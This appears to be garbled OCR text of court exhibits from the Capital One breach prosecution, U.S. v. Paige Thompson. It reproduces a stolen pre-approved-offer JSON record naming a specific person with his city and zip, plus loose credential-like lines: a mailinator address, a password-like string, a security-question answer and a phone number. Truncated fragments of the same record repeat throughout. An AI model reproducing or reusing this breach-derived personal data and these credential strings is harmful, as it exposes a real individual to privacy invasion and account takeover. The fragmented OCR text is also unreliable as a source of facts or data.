re pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
tLineEnd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
 pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
nd\":\", you are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}
proved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}

781-014



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 782
Admitted_____

./preapprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"001DG3","dateOfBirth":"1991-       ,"lastFourSSN":"       ,"firstName":"Joseph","middleName":"A","lastName":"Baleda","suffix":
[            ,"addrLine2":"    ","city":"SEATTLE","state":"WA","zip":"98109","emailAddr":"          ]@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you
are pre-approved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}

josephbaleda@mailinator.com
crakka442C
favorite food pizza
425-882-8080

d-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"001DG3","dateOfBirth":"1991-____","lastFourSSN":"____","firstName":"Joseph","middleName":"A","lastName":"Baleda","suffix":"","addrLine1":"____,"addrLine2":"____","city":"SEATTLE","state":"WA","zip":"98109","emailAddr":"____@gmail.com","dmsCreativeId":"40448","dmsCreativeVars":"{\"subjectLineEnd\":\", you
pproved for this Capital One Starter Card offer--a credit card with no deposit requirement\"}","dmCreativeVars":"{}"}

eda@mailinator.com
C
food pizza
080

782-003